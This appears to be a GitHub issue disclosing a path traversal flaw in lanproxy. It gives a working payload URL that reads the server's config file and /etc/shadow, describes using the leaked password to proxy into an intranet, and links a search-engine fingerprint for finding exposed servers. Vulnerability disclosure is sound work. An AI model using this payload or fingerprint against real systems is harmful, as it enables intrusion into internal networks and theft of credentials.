Path traversal vulnerability in lanproxy leads to connection to the intranet

Vendor of the product: https://github.com/ffay/lanproxy

Payload: http://192.168.5.43:8090/../conf/config.properties
Read configuration file
![image](https://user-images.githubusercontent.com/29968903/103599807-f57c5700-4f40-11eb-90df-3c09d3fa3a4e.png)

Configure the proxy to connect to the intranet after logging in with the password
![image](https://user-images.githubusercontent.com/29968903/103599837-04630980-4f41-11eb-979e-c05ae866f59f.png)

Read /etc/shadow
![image](https://user-images.githubusercontent.com/29968903/103599996-5d32a200-4f41-11eb-987b-39ff804d62dd.png)

Fingerprint: 
https://fofa.so/result?q=%22Server%3A+LPS-0.1%22&qbase64=IlNlcnZlcjogTFBTLTAuMSI%3D
![image](https://user-images.githubusercontent.com/29968903/103600131-b00c5980-4f41-11eb-9fb1-58cd907c073c.png)


Provide feedback

Saved searches

Use saved searches to filter your results more quickly

Path traversal vulnerability in lanproxy leads to connection to the intranet #1

Metadata

Assignees

Labels

Projects

Milestone

Relationships

Development

Path traversal vulnerability in lanproxy leads to connection to the intranet #1

Description

Metadata

Metadata

Assignees

Labels

Projects

Milestone

Relationships

Development

Issue actions